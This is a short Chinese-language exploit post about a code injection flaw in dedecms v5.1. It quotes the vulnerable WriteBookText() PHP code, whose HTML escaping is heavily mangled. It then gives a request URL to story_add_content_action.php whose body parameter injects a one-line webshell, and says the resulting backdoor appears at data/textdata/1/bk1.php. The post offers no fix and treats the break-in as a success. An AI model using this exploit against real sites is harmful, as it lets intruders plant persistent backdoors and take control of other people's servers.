dedecms v5.1 WriteBookText() code injection vul

\\\\include\\\\inc_bookfunctions.php --------------------------------------------------- …… function WriteBookText($cid,$body) {<span id=\\\"more-1944\\\"></span> global $cfg_cmspath,$cfg_basedir; $ipath = $cfg_cmspath.\\\"/data/textdata\\\"; $tpath = ceil($cid/5000); if(!is_dir($cfg_basedir.$ipath)) MkdirAll($cfg_basedir.$ipath,$GLOBALS[\\\'cfg_dir_purview\\\']); if(!is_dir($cfg_basedir.$ipath.\\\'/\\\'.$tpath)) MkdirAll($cfg_basedir.$ipath.\\\'/\\\'.$tpath,$GLOBALS[\\\'cfg_dir_purview\\\']); $bookfile = $cfg_basedir.$ipath.\\\"/{$tpath}/bk{$cid}.php\\\"; $body = \\\"<\\\".\\\"?php\\\\r\\\\n\\\".$body.\\\"\\\\r\\\\n?\\\".\\\">\\\"; @$fp = fopen($bookfile,\\\'w\\\'); @flock($fp); @fwrite($fp,$body); @fclose($fp); <div id=\\\"qhide_185676\\\" class=\\\"qt\\\" style=\\\"display: block;\\\">} </div> …… ————————————————— \\\\member\\\\story_add_content_action.php ————————————————— …… WriteBookText($arcID,addslashes($body)); …… 接着就是打开下面的地址： http://www.XXX.com/member/story_add_content_action.php?chapterid=1&arcID=1&body=?>后面加上一句话代码。当你看到成功的提示就表示成功了。 然后打开http://www.XXX.com/data/textdata/1/bk1.php就是我们生成的后门。如果一次没成功想再重来一遍的话，下次生成的文件就变成bk2.php。以此类推。这里我试了9次，嘿嘿。。。 dedecms v5.1 暂无